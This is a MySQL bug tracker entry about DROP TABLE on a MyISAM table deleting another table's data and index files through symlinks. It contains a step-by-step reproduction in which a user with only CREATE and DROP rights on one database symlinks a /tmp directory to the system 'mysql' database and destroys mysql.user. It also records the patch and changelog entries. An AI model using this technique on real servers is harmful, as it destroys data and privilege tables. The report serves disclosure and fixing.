Bug #40980 Drop table can remove another MyISAM table's data and index files
Submitted: 24 Nov 2008 14:40 Modified: 18 Jun 2010 1:21
Reporter: Ingo Strüwing
Status: Closed
Category: MySQL Server: DDL Severity: S3 (Non-critical)
Version: 4.1, 5.0, 5.1, 5.4, 6.0 OS: Any (Unix-like systems)
Assigned to: Sergey Vojtovich
Triage: Triaged: D1 (Critical) / R2 (Low) / E2 (Low)

[24 Nov 2008 14:40] Ingo Strüwing
Description:
This was detected during analysis of Bug#39277 (symlink.test fails on Debian), later (Problems with symbolic links), later (Creation of table with data and/or index files in data home directory succeeds).

It was not fixed with the bugfix for that bug. So the drop problem is split out here.

How to repeat:
Please find my comment and test case of 22 Nov 2008 in that bug report.
[24 Nov 2008 14:42] Ingo Strüwing
Copied triage settings from Bug#39277 as this is a split out from there.
[7 Jul 2009 16:07] Ingo Strüwing
The fact that the problem exists since day one doesn't reduce its severity.

The point with the "write access" might be confused. UNIX/Linux is a multi-user system. It has a permission system which can limit what a user can do on the system. It is no big problem to set permissions so that a certain user can neither read nor write datadir. As such he cannot do much harm to the database installation.

But usually every user has read/write access to /tmp. The problem I found thus requires an arbitrary account on the machine (with write access to /tmp, but neither read nor write access to datadir) and a database account with CREATE and DROP privileges in an arbitrary database (schema).

With this setup the user should not be able to do any harm to database objects outside of that database (schema). Write access to his home directory and /tmp should not be sufficient to influence the databases from the shell level either.

So what does it mean: "such users can mess-up the server in any way possible"? What possible attacks can he carry out with his limited permissions?

One thing he can do is this (you may replace MYSQL_TMP_DIR with /tmp or the user's home directory):

#
# Test #2 - Drop mysql.user with CREATE|DROP privileges on another DB.
#
CREATE USER 'mysql_user1';
#
# Create a database for mysql_user1 user's tables.
#
CREATE DATABASE mysql_db1;
#
# Grant mysql_user1 to create and drop tables in mysql_db1.
#
GRANT CREATE, DROP ON mysql_db1.* TO 'mysql_user1';
#
# Show which users we have in the table mysql.user.
#
SELECT User FROM mysql.user;
User
mysql_user1
root
root
root
#
# Connection con1 - mysql_user1
#
# Make a directory bug39277 somewhere, for example in MYSQL_TMP_DIR.
#
# Create table mysql_db1.user, with its files in bug39277.
#
CREATE TABLE mysql_db1.user (c1 INT) ENGINE=MyISAM
DATA DIRECTORY='MYSQL_TMP_DIR/bug39277'
      INDEX DIRECTORY='MYSQL_TMP_DIR/bug39277';
#
# Remove the table files and the directory bug39277.
#
# Make a symlink from 'mysql' database to MYSQL_TMP_DIR/bug39277.
#
# Drop table mysql_db1.mysql with the files from mysql.user.
DROP TABLE mysql_db1.user;
#
# Connection default - root
#
# Show which users we have in table mysql.user.
# This does work as the table is still open in the table cache.
#
SELECT User FROM mysql.user;
User
mysql_user1
root
root
root
#
# Close table mysql.user.
#
FLUSH TABLE mysql.user;
#
# Show which users we have in the table mysql.user. Bummer!
#
SELECT User FROM mysql.user;
ERROR HY000: Can't find file: 'user' (errno: 2)
#
# Due to missing table files, we cannot drop the user any more.
#
DROP USER 'mysql_user1';
ERROR HY000: Can't find file: 'user' (errno: 2)
#
# Cleanup.
#
DROP DATABASE mysql_db1;

IMHO this should not be allowed. DROP should refuse to drop a table if it uses symlinks that resolve into datadir. The attempt should even be reported to the error log.
[14 Jul 2009 13:59] Sergei Golubchik
It's a duplicate of Bug#32167 (and is possible because of a bug in a fix for Bug#32167).
[17 Dec 2009 14:21] Tomas Hoger
Was this problem fixed in any version?  This was marked as dupe of bug #32167, but I don't see any comment there indicating related change.  Thanks!
[17 Dec 2009 15:16] Sergei Golubchik
At least it's not fixed in the current 5.1; I've just tested.
[22 Mar 2010 11:06] Konstantin Osipov
Server: DDL is Runtime.
[29 Mar 2010 14:52] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/104568

3431 Sergey Vojtovich	2010-03-29
      BUG#40980 - Drop table can remove another MyISAM table's
                  data and index files
      
      It was possible if DATA/INDEX DIRECTORY is pointing to
      symlinked MySQL data home directory.
      
      Do not allow to drop data/index files implicitly symlinked
      to data home directory.
     @ storage/myisam/mi_delete_table.c
        Do not allow to drop data/index files implicitly symlinked
        to data home directory.
[30 Mar 2010 15:23] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/104639

3431 Sergey Vojtovich	2010-03-30
      BUG#40980 - Drop table can remove another MyISAM table's
                  data and index files
      
      It was possible if DATA/INDEX DIRECTORY is pointing to
      symlinked MySQL data home directory.
      
      Do not allow to drop data/index files implicitly symlinked
      to data home directory. For such tables remove symlink only.
     @ mysql-test/r/symlink.result
        A test case for BUG#40980.
     @ mysql-test/t/symlink.test
        A test case for BUG#40980.
     @ storage/myisam/mi_delete_table.c
        Do not allow to drop data/index files implicitly symlinked
        to data home directory. For such tables remove symlink only.
[30 Mar 2010 16:28] Ingo Strüwing
Approved. Much better now. Thank you for the test. :-)
[1 Apr 2010 14:49] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/104914

3431 Sergey Vojtovich	2010-04-01
      BUG#40980 - Drop table can remove another MyISAM table's
                  data and index files
      
      It was possible if DATA/INDEX DIRECTORY is pointing to
      symlinked MySQL data home directory.
      
      Do not allow to drop data/index files implicitly symlinked
      to data home directory. For such tables remove symlink only.
     @ mysql-test/r/symlink.result
        A test case for BUG#40980.
     @ mysql-test/t/symlink.test
        A test case for BUG#40980.
     @ storage/myisam/mi_delete_table.c
        Do not allow to drop data/index files implicitly symlinked
        to data home directory. For such tables remove symlink only.
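The rule stated in the commit message above (a table file that resolves into the data home directory is not deleted, only its symlink is), as an added C example that is not the MySQL patch or any code from the project. `guarded_drop`, `run_scenario` and the temp-tree layout are hypothetical and constructed here; the layout assumes the table's file in the database directory is a symlink into its DATA DIRECTORY.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum { DROP_ERROR = -1, DROPPED_FILE_AND_LINK = 0, DROPPED_LINK_ONLY = 1 };

/* Hypothetical helper (not MySQL code): resolve the table-file symlink; if the
 * final target lies inside datadir, log it and remove only the link,
 * otherwise remove the target file and the link. */
int guarded_drop(const char *link_path, const char *datadir)
{
    char target[PATH_MAX], home[PATH_MAX];
    if (!realpath(datadir, home) || !realpath(link_path, target)) return DROP_ERROR;
    size_t n = strlen(home);
    if (strncmp(target, home, n) == 0 && (target[n] == '/' || target[n] == '\0')) {
        fprintf(stderr, "drop: %s resolves into datadir, removing link only\n", link_path);
        return unlink(link_path) == 0 ? DROPPED_LINK_ONLY : DROP_ERROR;
    }
    return (unlink(target) == 0 && unlink(link_path) == 0) ? DROPPED_FILE_AND_LINK : DROP_ERROR;
}

static int touch(const char *p) { FILE *f = fopen(p, "w"); return f ? fclose(f) : -1; }
/* Constructed layout in a private temp tree (becomes the working directory):
 * data/mysql/user.MYD is another table's file; data/db1/user.MYD is a symlink
 * to ext/user.MYD. With hostile set, ext is itself a symlink to data/mysql. */
int run_scenario(int hostile, int *other_table_intact)
{
    char root[] = "/tmp/bug40980-XXXXXX";
    if (!mkdtemp(root) || chdir(root) || mkdir("data", 0700) ||
        mkdir("data/mysql", 0700) || mkdir("data/db1", 0700) ||
        touch("data/mysql/user.MYD") ||
        (hostile ? symlink("data/mysql", "ext")
                 : (mkdir("ext", 0700) || touch("ext/user.MYD"))) ||
        symlink("../../ext/user.MYD", "data/db1/user.MYD"))
        return DROP_ERROR;
    int rc = guarded_drop("data/db1/user.MYD", "data");
    *other_table_intact = (access("data/mysql/user.MYD", F_OK) == 0);
    return rc;
}

int main(void) {
    int intact = 0, rc = run_scenario(1, &intact);
    printf("hostile layout: rc=%d other_table_intact=%d\n", rc, intact);
    return rc == DROP_ERROR;
}
```

The resolve step and the unlink are separate system calls, so a location writable by other local users still leaves a window between check and delete; keeping DATA DIRECTORY and INDEX DIRECTORY paths out of such locations removes it.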
[6 Apr 2010 7:59] Bugs System
Pushed into 5.1.46 (revid:sergey.glukhov@sun.com-20100405111026-7kz1p8qlzglqgfmu) (version source revid:svoj@sun.com-20100401181734-vj1pnmh5129lep5z) (merge vers: 5.1.46) (pib:16)
[15 Apr 2010 16:15] Paul Dubois
Noted in 5.1.46 changelog.

It was possible for DROP TABLE of one MyISAM table to remove the data and index files of a different MyISAM table.

Setting report to Need Merge pending push into Celosia.
[28 May 2010 5:49] Bugs System
Pushed into mysql-next-mr (revid:alik@sun.com-20100524190136-egaq7e8zgkwb9aqi) (version source revid:alik@sun.com-20100422150750-vp0n37kp9ywq5ghf) (pib:16)
[28 May 2010 6:18] Bugs System
Pushed into 6.0.14-alpha (revid:alik@sun.com-20100524190941-nuudpx60if25wsvx) (version source revid:alik@sun.com-20100422150658-fkhgnwwkyugtxrmu) (merge vers: 6.0.14-alpha) (pib:16)
[28 May 2010 6:46] Bugs System
Pushed into 5.5.5-m3 (revid:alik@sun.com-20100524185725-c8k5q7v60i5nix3t) (version source revid:alexey.kopytov@sun.com-20100403175504-n95vgc3liknhj3fn) (merge vers: 5.5.4-m3) (pib:16)
[29 May 2010 2:26] Paul Dubois
Noted in 5.5.5, 6.0.14 changelogs.
[17 Jun 2010 11:50] Bugs System
Pushed into 5.1.47-ndb-7.0.16 (revid:martin.skold@mysql.com-20100617114014-bva0dy24yyd67697) (version source revid:vasil.dimov@oracle.com-20100331130613-8ja7n0vh36a80457) (merge vers: 5.1.46) (pib:16)
[17 Jun 2010 12:27] Bugs System
Pushed into 5.1.47-ndb-6.2.19 (revid:martin.skold@mysql.com-20100617115448-idrbic6gbki37h1c) (version source revid:martin.skold@mysql.com-20100609211156-tsac5qhw951miwtt) (merge vers: 5.1.46-ndb-6.2.19) (pib:16)
[17 Jun 2010 13:15] Bugs System
Pushed into 5.1.47-ndb-6.3.35 (revid:martin.skold@mysql.com-20100617114611-61aqbb52j752y116) (version source revid:vasil.dimov@oracle.com-20100331130613-8ja7n0vh36a80457) (merge vers: 5.1.46) (pib:16)